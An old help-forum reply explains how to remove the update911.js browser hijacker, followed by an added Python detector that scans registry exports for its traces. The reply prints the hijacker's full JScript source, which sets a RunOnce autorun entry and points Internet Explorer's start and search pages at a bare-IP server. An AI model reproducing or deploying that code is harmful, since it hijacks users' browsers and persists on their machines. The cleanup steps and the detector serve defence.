02-28-2004, 09:48 PM   #12
wumpi
Solution

Heh, sounds cool. But be careful - if you email him, he might use your email for more spamming purposes.

Seriously, you must do the following:
A file called update911.js is placed in your WinNT or Windows directory

Content of the file:
Code:
var url = "http://81.211.105.9/index.php?v=1";
var burl = "http://81.211.105.9/search.php?v=1";
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tfolder = fso.GetSpecialFolder(0);
var filepath = tfolder + "\\update911.js";
var Shell = new ActiveXObject("WScript.Shell");
Shell.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\tlc",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",burl);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst","no");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Custom Search URL",1,"REG_DWORD")

It is called in the Windows registry.
1. Open Regedit: Start/Run/regedit.exe
2. Search for "update911.js" and delete the key(s)
3. Search for "http://81.211.105.9/index.php?v=1" and delete the key(s)
4. Delete the file update911.js in your Windows folder

You can also find some info on Sophos's Anti-Virus page.

Wumpi
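A defender-side check for the registry changes made by the script in the post above, added here as an example and not part of the original post: it scans the decoded text of a `reg export` dump for the two indicators from the post and, going slightly beyond them, for any script file in a Run/RunOnce key or an Internet Explorer page pointing at a bare IP address. The sample export and its `C:\WINNT` path are constructed, and `scan_reg_export` is a hypothetical helper name.

```python
import re
from urllib.parse import urlparse

# Indicators taken from the post above.
INDICATORS = ("update911.js", "81.211.105.9")
AUTORUN = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.I)
IE_MAIN = re.compile(r"\\Internet Explorer\\Main$", re.I)
IE_PAGES = {"start page", "search page", "search bar"}
SCRIPT_EXT = re.compile(r"\.(js|jse|vbs|vbe|wsf)\b", re.I)
IP_HOST = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")
# "name"="data" string values; dword/hex values are ignored.
VALUE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')

# Constructed sample of what an export could look like after the script ran.
SAMPLE = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"tlc"="C:\\WINNT\\update911.js"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://81.211.105.9/index.php?v=1"
"Search Bar"="http://81.211.105.9/search.php?v=1"
"Use Search Asst"="no"
"Use Custom Search URL"=dword:00000001
'''

def scan_reg_export(text):
    """Return (key, value name, data, reasons) for each suspicious string value."""
    findings, key = [], None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]          # current registry key path
            continue
        m = VALUE.match(line)
        if not m or key is None:
            continue
        # Undo .reg escaping (\\ -> \, \" -> ").
        name, data = (re.sub(r"\\(.)", r"\1", g) for g in m.groups())
        reasons = []
        if any(i in data.lower() for i in INDICATORS):
            reasons.append("known indicator")
        if AUTORUN.search(key) and SCRIPT_EXT.search(data):
            reasons.append("script in autorun key")
        if (IE_MAIN.search(key) and name.lower() in IE_PAGES
                and IP_HOST.match(urlparse(data).hostname or "")):
            reasons.append("IE page set to bare IP address")
        if reasons:
            findings.append((key, name, data, ", ".join(reasons)))
    return findings
```

Real exports from regedit are UTF-16, so decode the file before passing its text in.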